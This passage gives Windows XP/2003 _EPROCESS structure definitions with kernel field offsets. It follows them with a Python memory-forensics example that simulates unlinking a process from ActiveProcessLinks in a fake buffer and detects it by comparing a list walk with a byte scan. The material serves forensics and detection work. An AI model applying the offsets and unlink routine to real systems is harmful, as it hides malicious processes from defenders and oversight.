ULONG Unused : 11;
};
};
NTSTATUS ExitStatus;
USHORT NextPageColor;
union
{
struct
{
UCHAR SubSystemMinorVersion;
UCHAR SubSystemMajorVersion;
};
USHORT SubSystemVersion;
};
UCHAR PriorityClass;
BOOLEAN WorkingSetAcquiredUnsafe;
} EPROCESS_XP, *PEPROCESS_XP;

typedef struct _EPROCESS_2K3
{
/*+0x000*/ KPROCESS_2K3 Pcb;
/*+0x06c*/ EX_PUSH_LOCK ProcessLock;
/*+0x070*/ LARGE_INTEGER CreateTime;
/*+0x078*/ LARGE_INTEGER ExitTime;
/*+0x080*/ EX_RUNDOWN_REF RundownProtect;
/*+0x084*/ PVOID UniqueProcessId;
/*+0x088*/ LIST_ENTRY ActiveProcessLinks;
/*+0x090*/ ULONG QuotaUsage[3];
/*+0x09c*/ ULONG QuotaPeak[3];
/*+0x0a8*/ ULONG CommitCharge;
/*+0x0ac*/ ULONG PeakVirtualSize;
/*+0x0b0*/ ULONG VirtualSize;
/*+0x0b4*/ LIST_ENTRY SessionProcessLinks;
/*+0x0bc*/ PVOID DebugPort;
/*+0x0c0*/ PVOID ExceptionPort;
/*+0x0c4*/ PHANDLE_TABLE ObjectTable;
/*+0x0c8*/ EX_FAST_REF Token;
/*+0x0cc*/ ULONG WorkingSetPage;
/*+0x0d0*/ KGUARDED_MUTEX AddressCreationLock;
/*+0x0f0*/ KSPIN_LOCK HyperSpaceLock;
/*+0x0f4*/ PETHREAD_2K3 ForkInProgress;
/*+0x0f8*/ ULONG HardwareTrigger;
/*+0x0fc*/ PMM_AVL_TABLE PhysicalVadRoot;
/*+0x100*/ PVOID CloneRoot;
/*+0x104*/ ULONG NumberOfPrivatePages;
/*+0x108*/ ULONG NumberOfLockedPages;
/*+0x10c*/ PVOID Win32Process;
/*+0x110*/ PEJOB Job;
/*+0x114*/ PSECTION_OBJECT SectionObject;
/*+0x118*/ PVOID SectionBaseAddress;
/*+0x11c*/ PEPROCESS_QUOTA_BLOCK QuotaBlock;
/*+0x120*/ PPAGEFAULT_HISTORY WorkingSetWatch;
/*+0x124*/ PVOID Win32WindowStation;
/*+0x128*/ PVOID InheritedFromUniqueProcessId;
/*+0x12c*/ PVOID LdtInformation;
/*+0x130*/ PVOID VadFreeHint;
/*+0x134*/ PVOID VdmObjects;
/*+0x138*/ PVOID DeviceMap;
/*+0x13c*/ PVOID Spare0[3];
union {
/*+0x148*/HARDWARE_PTE PageDirectoryPte;
/*+0x148*/ULONGLONG Filler;
};
/*+0x150*/ PVOID Session;
/*+0x154*/ UCHAR ImageFileName[16];
/*+0x164*/ LIST_ENTRY JobLinks;
/*+0x16c*/ PVOID LockedPagesList;
/*+0x170*/ LIST_ENTRY ThreadListHead;
/*+0x178*/ PVOID SecurityPort;
/*+0x17c*/ PVOID PaeTop;
/*+0x180*/ ULONG ActiveThreads;
/*+0x184*/ ULONG GrantedAccess;
/*+0x188*/ ULONG DefaultHardErrorProcessing;
/*+0x18c*/ NTSTATUS LastThreadExitStatus;
/*+0x190*/ PPEB Peb;
/*+0x194*/ EX_FAST_REF PrefetchTrace;
/*+0x198*/ LARGE_INTEGER ReadOperationCount;
/*+0x1a0*/ LARGE_INTEGER WriteOperationCount;
/*+0x1a8*/ LARGE_INTEGER OtherOperationCount;
/*+0x1b0*/ LARGE_INTEGER ReadTransferCount;
/*+0x1b8*/ LARGE_INTEGER WriteTransferCount;
/*+0x1c0*/ LARGE_INTEGER OtherTransferCount;
/*+0x1c8*/ ULONG CommitChargeLimit;
/*+0x1cc*/ ULONG CommitChargePeak;
/*+0x1d0*/ PVOID AweInfo;
/*+0x1d4*/ SE_AUDIT_PROCESS_CREATION_INFO SeAuditProcessCreationInfo;
/*+0x1d8*/ MMSUPPORT_2K3 Vm;
/*+0x238*/ LIST_ENTRY MmProcessLinks;
/*+0x240*/ ULONG ModifiedPageCount;
/*+0x244*/ ULONG JobStatus;
union {
/*+0x248*/ ULONG Flags;
struct {
/*+0x248*/ ULONG CreateReported : 1;
/*+0x248*/ ULONG NoDebugInherit : 1;
/*+0x248*/ ULONG ProcessExiting : 1;
/*+0x248*/ ULONG ProcessDelete : 1;
/*+0x248*/ ULONG Wow64SplitPages : 1;
/*+0x248*/ ULONG VmDeleted : 1;
/*+0x248*/ ULONG OutswapEnabled : 1;
/*+0x248*/ ULONG Outswapped : 1;
/*+0x248*/ ULONG ForkFailed : 1;
/*+0x248*/ ULONG Wow64VaSpace4Gb : 1;
/*+0x248*/ ULONG AddressSpaceInitialized : 2;
/*+0x248*/ ULONG SetTimerResolution : 1;
/*+0x248*/ ULONG BreakOnTermination : 1;
/*+0x248*/ ULONG SessionCreationUnderway : 1;
/*+0x248*/ ULONG WriteWatch : 1;
/*+0x248*/ ULONG ProcessInSession : 1;
/*+0x248*/ ULONG OverrideAddressSpace : 1;
/*+0x248*/ ULONG HasAddressSpace : 1;
/*+0x248*/ ULONG LaunchPrefetched : 1;
/*+0x248*/ ULONG InjectInpageErrors : 1;
/*+0x248*/ ULONG VmTopDown : 1;
/*+0x248*/ ULONG ImageNotifyDone : 1;
/*+0x248*/ ULONG PdeUpdateNeeded : 1;
/*+0x248*/ ULONG VdmAllowed : 1;
/*+0x248*/ ULONG Unused : 7;
};
};
/*+0x24c*/ NTSTATUS ExitStatus;
/*+0x250*/ USHORT NextPageColor;
union {
struct {
/*+0x252*/ UCHAR SubSystemMinorVersion;
/*+0x253*/ UCHAR SubSystemMajorVersion;
};
/*+0x252*/ USHORT SubSystemVersion;
};

/*+0x254*/ UCHAR PriorityClass;
/*+0x258*/ MM_AVL_TABLE VadRoot;
} EPROCESS_2K3, *PEPROCESS_2K3;
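The offsets annotated on the 2003 structure above are exactly what memory-forensics tooling needs to enumerate processes from a memory image: walk ActiveProcessLinks from a known _EPROCESS (the pslist view) and, independently, carve candidate _EPROCESS blocks out of the raw bytes (the psscan view), so that an object that has been unlinked from the list still shows up in the second view. The Python below is an added example, not part of the original post or of any Windows source. It uses the +0x084 (UniqueProcessId), +0x088 (ActiveProcessLinks) and +0x154 (ImageFileName) offsets from the listing over a constructed fake memory image; BASE_VA, STRIDE, the identity address mapping and the validation heuristic in looks_like_eprocess are assumptions of the example, not Windows invariants.

```python
import string
import struct

# 32-bit Windows Server 2003 _EPROCESS field offsets, taken from the listing above.
OFF_UNIQUE_PID = 0x084
OFF_ACTIVE_LINKS = 0x088   # LIST_ENTRY: Flink at +0, Blink at +4
OFF_IMAGE_NAME = 0x154     # UCHAR ImageFileName[16]

# Layout assumptions of the constructed image (not Windows values): each fake
# _EPROCESS sits STRIDE bytes apart starting at BASE_VA, virtual == physical.
BASE_VA = 0x81000000
STRIDE = 0x300
PRINTABLE = set((string.ascii_letters + string.digits + "._-").encode())


class FakeKernelImage:
    """Flat buffer standing in for a memory dump with an identity mapping."""

    def __init__(self, size):
        self.buf = bytearray(size)

    def read_u32(self, va):
        off = va - BASE_VA
        if off < 0 or off + 4 > len(self.buf):
            raise ValueError(f"address {va:#x} outside image")
        return struct.unpack_from("<I", self.buf, off)[0]

    def write_u32(self, va, value):
        struct.pack_into("<I", self.buf, va - BASE_VA, value)

    def read(self, va, n):
        return bytes(self.buf[va - BASE_VA:va - BASE_VA + n])


def build_image(processes, unlink_pid=None):
    """Lay out (pid, name) pairs as circularly linked _EPROCESS blocks. If
    unlink_pid is given, that block is removed from the list but its bytes stay
    in place, which is what a scanner has to recover from."""
    img = FakeKernelImage(STRIDE * len(processes))
    vas = [BASE_VA + i * STRIDE for i in range(len(processes))]
    for i, (pid, name) in enumerate(processes):
        va = vas[i]
        img.write_u32(va + OFF_UNIQUE_PID, pid)
        struct.pack_into("16s", img.buf, va - BASE_VA + OFF_IMAGE_NAME, name.encode())
        img.write_u32(va + OFF_ACTIVE_LINKS, vas[(i + 1) % len(vas)] + OFF_ACTIVE_LINKS)
        img.write_u32(va + OFF_ACTIVE_LINKS + 4, vas[(i - 1) % len(vas)] + OFF_ACTIVE_LINKS)
    if unlink_pid is not None:
        victim = vas[[p for p, _ in processes].index(unlink_pid)]
        flink = img.read_u32(victim + OFF_ACTIVE_LINKS)
        blink = img.read_u32(victim + OFF_ACTIVE_LINKS + 4)
        img.write_u32(blink, flink)       # predecessor.Flink = victim.Flink
        img.write_u32(flink + 4, blink)   # successor.Blink  = victim.Blink
    return img, vas[0]


def read_process(img, eproc):
    pid = img.read_u32(eproc + OFF_UNIQUE_PID)
    raw = img.read(eproc + OFF_IMAGE_NAME, 16)
    return (pid, raw.split(b"\0", 1)[0].decode("ascii", "replace"))


def walk_active_process_list(img, head_eprocess_va, max_entries=1024):
    """pslist view: follow Flink until the list returns to where it started.
    Each Flink points at the next object's ActiveProcessLinks field, so the
    _EPROCESS base is the link address minus OFF_ACTIVE_LINKS."""
    found = []
    start = link = head_eprocess_va + OFF_ACTIVE_LINKS
    for _ in range(max_entries):
        found.append(read_process(img, link - OFF_ACTIVE_LINKS))
        link = img.read_u32(link)
        if link == start:
            return found
    raise RuntimeError("ActiveProcessLinks did not terminate; list is corrupt")


def looks_like_eprocess(img, va):
    """Heuristic (assumed for this example): a non-zero pid, a printable
    NUL-terminated image name, and list pointers that fall inside the image."""
    try:
        name = img.read(va + OFF_IMAGE_NAME, 16)
        pid = img.read_u32(va + OFF_UNIQUE_PID)
        flink = img.read_u32(va + OFF_ACTIVE_LINKS)
        blink = img.read_u32(va + OFF_ACTIVE_LINKS + 4)
    except ValueError:
        return False
    if pid == 0 or not name or name[0] == 0:
        return False
    if any(c not in PRINTABLE for c in name.split(b"\0", 1)[0]):
        return False
    lo, hi = BASE_VA, BASE_VA + len(img.buf)
    return lo <= flink < hi and lo <= blink < hi


def scan_for_processes(img, step=8):
    """psscan view: test every step-aligned offset against the heuristic."""
    return [read_process(img, BASE_VA + off)
            for off in range(0, len(img.buf) - OFF_IMAGE_NAME - 16, step)
            if looks_like_eprocess(img, BASE_VA + off)]


def find_hidden_processes(img, head_eprocess_va):
    """Cross-view: whatever the scan finds that the list walk does not."""
    listed = set(walk_active_process_list(img, head_eprocess_va))
    return sorted(set(scan_for_processes(img)) - listed)


if __name__ == "__main__":
    procs = [(4, "System"), (368, "smss.exe"), (420, "csrss.exe"),
             (444, "winlogon.exe"), (804, "svchost.exe")]   # constructed sample
    img, head = build_image(procs, unlink_pid=804)
    print("pslist:", walk_active_process_list(img, head))
    print("hidden:", find_hidden_processes(img, head))
```

The walk gives the first four processes and nothing else, while the scan still finds the block for pid 804 because its bytes, including its own stale Flink and Blink, are untouched. Real tools validate candidates with pool-tag and size checks rather than the name-and-pointer heuristic used here, and have to translate virtual addresses through the page tables instead of the identity mapping this example assumes.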